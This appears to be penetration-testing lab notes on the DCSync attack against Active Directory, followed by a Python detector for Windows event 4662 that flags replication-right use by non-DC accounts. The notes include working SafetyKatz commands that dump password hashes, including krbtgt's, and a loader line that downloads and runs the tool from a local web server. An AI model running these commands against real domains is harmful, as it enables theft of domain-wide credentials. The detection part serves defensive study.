DCSYNC
A technique that impersonates a Domain Controller and uses the MS-DRSR replication protocol to request password data (hashes) over the network. It never touches the ntds.dit file on disk.
Requirements: The account must have Domain Admin privileges, or the specific replication rights (Get-Changes and Get-Changes-All), for the replication request to be authorized.
SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\<USER>"
# with loader
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"
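
Detection side, as an added example (not part of the original notes): because the request exercises the Get-Changes / Get-Changes-All rights, a Domain Controller with Directory Service Access auditing enabled logs Security event 4662 for it, and a subject that is not itself a DC stands out. The event dictionaries, host names and user names below are constructed, and find_dcsync is a hypothetical helper name.

```python
# Added example: flag DCSync-style replication requests in Security event 4662.
# Control-access right GUIDs for directory replication (fixed AD schema values).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100  # access-mask bit logged when an extended right is used


def find_dcsync(events, dc_accounts, allowlist=()):
    """Return an alert for each 4662 event where a subject that is not a
    known DC (or an allowlisted sync account) exercised a replication right."""
    trusted = {a.lower() for a in (*dc_accounts, *allowlist)}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
            continue
        props = ev.get("Properties", "").lower()
        rights = sorted(n for g, n in REPL_RIGHTS.items() if g in props)
        subject = ev.get("SubjectUserName", "")
        if rights and subject.lower() not in trusted:
            alerts.append({"time": ev.get("TimeCreated"),
                           "subject": subject, "rights": rights})
    return alerts


# Constructed sample events: field names follow the 4662 event schema,
# hosts, users and timestamps are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-05-01T10:00:01Z", "SubjectUserName": "DCORP-DC2$",
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-05-01T10:07:42Z", "SubjectUserName": "student1",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-05-01T10:09:00Z", "SubjectUserName": "helpdesk1",
     "AccessMask": "0x10", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T10:10:00Z", "SubjectUserName": "student1"},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, dc_accounts=["DCORP-DC$", "DCORP-DC2$"]):
        print(alert)
```

Legitimate non-DC replicators, such as a directory synchronization service account, belong in allowlist so that the remaining alerts are worth triaging.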